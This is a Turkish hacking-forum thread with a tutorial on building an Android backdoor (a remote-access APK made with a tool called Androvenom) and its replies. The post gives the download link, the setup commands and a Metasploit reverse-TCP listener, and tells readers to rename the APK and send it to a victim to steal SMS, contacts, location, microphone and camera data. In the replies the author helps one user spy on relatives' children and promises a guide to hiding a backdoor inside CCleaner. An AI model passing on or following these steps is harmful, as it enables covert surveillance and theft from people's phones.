[Linux] Android Backdoor oluşturun

ARES AFFETMEZ

Uzman üye
23 Ağu 2017
1,759
1
C:\

KSfxAT.gif

Merhaba, bu konumda sizlere linux ortamında nasıl android backdoor oluşturacağınızı ve kullanacağınızı göstereceğim.

Kullanacağımız araç: Androvenom bu araç karşı cihazdaki arama kayıtlarını, sms kayıtlarını, rehberini almamıza, istediğimize sms göndermeye, wifi bilgisi, konum bilgisi, ekran kilitleme, rootlumu değilmi kontrol etmeye ve ses ayarlarıyla oynamaya, mikrofon dinlemeye, kamerasını açmaya, kayıt almaya telefonu çöp etmeye, dosyalarına erişmeye
silip başka dosya atmaya ve daha bir çok şeye yarar.

Öncelikle upload ettiğim linkten aracı indirin
Kod:
[URL="https://www.dosyaupload.com/qRd1"]https://www.dosyaupload.com/qRd1[/URL]

İndikten sonra Downloads klasörüne girip zip'ten çıkartıp Androvenom klasörüne girin ve sağ tıklayarak open in terminal diyerek açabilirsiniz veya konsol ile cd Downloads>ls>chmod +x Androvenom>./androvenom komutlarını sırasıyla kullanarak açabilirsiniz.

Ben klasörden açtım devam ediyorum ls>chmod +x Androvenom.sh>./Androvenom.sh komutlarını kullanıyoruz.

Aracımız açıldı burada ise 2. seçeneği seçeceğiz 2 yazıp enterliyoruz

Bizden ıp ve port girmemizi isteyecek ben local host'ta olan cihazlara atacağım için local adresimi yazıyorum ip yazıp enterleyin port yazmanızı isteyecek portunuzuda yazın enterleyin ve apk dosyasını Androvenom klasörüne çıkartacak.

Ve backdoor hazır.

Buradaki androveom_tcp.apk isimli dosya bizim arka kapımız bu apk dosyasının adını istediğiniz gibi değiştirip kurbana atın.

Terminale şu komutları sırayla giriyoruz sudo service postgresql start > sudo msfconsole -r revtcp.rc

Backdoor sıkıntısız olarak çalışıyorsa bu şekilde karşınıza çıkacaktır eğer Exploit running as background job 0 yazıyorsa karşı cihazda çalışmıyor veya yüklü değil demektir. Tüm komutları görmek için help yazmanız yeterlidir.

Konumuz bu kadardı :)

Son düzenleme:

Mota

Üye
8 Eyl 2016
59
0
Kaliforniya
Eline emeğine sağlık. Fakat verdiğiniz linkten indirdiğim zaman dosya açılmıyor, veya o dosyayı açacak bir dosya yok?. Aydınlatır mısınız.

MEMO_baba

Uzman üye
6 Kas 2009
1,017
28
Eline sağlık dostum gayet açıklayıcı ve çarpıcı olmuş :) Başarılarının devamını yürekten dilerim

ARES AFFETMEZ

Uzman üye
23 Ağu 2017
1,759
1
Eline emeğine sağlık. Fakat verdiğiniz linkten indirdiğim zaman dosya açılmıyor, veya o dosyayı açacak bir dosya yok?. Aydınlatır mısınız.

Linux'a indirdiysen zipten çıkarman lazım üstüne sağ tıklayarak çıkarabilirsin veya ana makinede çıkar linuxa sürükle bırak yada terminalde
Kod:
unzip dosya_adi.zip

Son düzenleme:

ahmethx

Üye
19 Ağu 2017
149
0

KSfxAT.gif

Merhaba, bu konumda sizlere linux ortamında nasıl android backdoor oluşturacağınızı ve kullanacağınızı göstereceğim.

Kullanacağımız araç: Androvenom bu araç karşı cihazdaki arama kayıtlarını, sms kayıtlarını, rehberini almamıza, istediğimize sms göndermeye, wifi bilgisi, konum bilgisi, ekran kilitleme, rootlumu değilmi kontrol etmeye ve ses ayarlarıyla oynamaya, mikrofon dinlemeye, kamerasını açmaya, kayıt almaya telefonu çöp etmeye, dosyalarına erişmeye
silip başka dosya atmaya ve daha bir çok şeye yarar.

Öncelikle upload ettiğim linkten aracı indirin
Kod:
[URL="https://www.dosyaupload.com/qRd1"]https://www.dosyaupload.com/qRd1[/URL]

İndikten sonra Downloads klasörüne girip zip'ten çıkartıp Androvenom klasörüne girin ve sağ tıklayarak open in terminal diyerek açabilirsiniz veya konsol ile cd Downloads>ls>chmod +x Androvenom>./androvenom komutlarını sırasıyla kullanarak açabilirsiniz.

Ben klasörden açtım devam ediyorum ls>chmod +x Androvenom.sh>./Androvenom.sh komutlarını kullanıyoruz.

Aracımız açıldı burada ise 2. seçeneği seçeceğiz 2 yazıp enterliyoruz

Bizden ıp ve port girmemizi isteyecek ben local host'ta olan cihazlara atacağım için local adresimi yazıyorum ip yazıp enterleyin port yazmanızı isteyecek portunuzuda yazın enterleyin ve apk dosyasını Androvenom klasörüne çıkartacak.

Ve backdoor hazır.

Buradaki androveom_tcp.apk isimli dosya bizim arka kapımız bu apk dosyasının adını istediğiniz gibi değiştirip kurbana atın.

Terminale şu komutları sırayla giriyoruz sudo service postgresql start > sudo msfconsole -r revtcp.rc

Backdoor sıkıntısız olarak çalışıyorsa bu şekilde karşınıza çıkacaktır eğer Exploit running as background job 0 yazıyorsa karşı cihazda çalışmıyor veya yüklü değil demektir. Tüm komutları görmek için help yazmanız yeterlidir.

Konumuz bu kadardı :)

hocam windowsta çalışmıyormu? dosyayı açıcak bişey yok

MaskedMenace

Katılımcı Üye
24 Ara 2015
252
0
injustice
Anlatımınız ve bilgileriniz için sağolun ben bunu yeğenlerim üzerinde denemek istiyorum aile fertleri takip etmek istiyor çocukların ne yaptıklarını kimlerle konuştuklarını bilmek istiyor. Ben kendi telefonuma deneme maksadı ile yaptım fakat hata verdi telefonda yüklü olmasına rağmen localhost yerine uzaktaki telefon için veya ağa bağlı telefonn için IP Adresi ve Portu ne yazmam gerekir ? Mantık olarak RAT mantığı ile aynımı Sabit bir tane IP ve modemde açılmış bir port yeterli midir ? Teşekkürler

ARES AFFETMEZ

Uzman üye
23 Ağu 2017
1,759
1
hocam windowsta çalışmıyormu? dosyayı açıcak bişey yok
Hayır windows üzerinde çalışmaz
Anlatımınız ve bilgileriniz için sağolun ben bunu yeğenlerim üzerinde denemek istiyorum aile fertleri takip etmek istiyor çocukların ne yaptıklarını kimlerle konuştuklarını bilmek istiyor. Ben kendi telefonuma deneme maksadı ile yaptım fakat hata verdi telefonda yüklü olmasına rağmen localhost yerine uzaktaki telefon için veya ağa bağlı telefonn için IP Adresi ve Portu ne yazmam gerekir ? Mantık olarak RAT mantığı ile aynımı Sabit bir tane IP ve modemde açılmış bir port yeterli midir ? Teşekkürler

Evet bunada bir rat denilebilir sabit ip ve portunu yazarsan çalışacaktır uzaktaki cihazları takip edebilirsin

7 Tem 2007
9,549
89
Güzel konu, eline sağlık.
Oluşturulan .apk nın google protect e yakalanma durumu nedir. Uyarı almadan kurabiliyor musun cihaza.

ARES AFFETMEZ

Uzman üye
23 Ağu 2017
1,759
1
Ƴαĸαмoz1Յ1Գ;8525200' Alıntı:
Güzel konu, eline sağlık.
Oluşturulan .apk nın google protect e yakalanma durumu nedir. Uyarı almadan kurabiliyor musun cihaza.

Bunu yakalıyor devre dışı bırakılması gerekir abi neyin içine atarlar bilmem ama ccleaner'in içine backdoor gizleyeceğimiz konuyu hazırlayacağım

TOMAR

Üye
18 May 2018
180
0
NEREYE ?
Yapıyorum fakat vmware wifi ile değil ethernet ile bağlı gözüküyor...
Ve nasıl localhost kuruluyor

Mavice38

Yeni üye
8 May 2020
15
0
Reis bu apk yı telefondan silersen erişimin gider mi kaybolur mu

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.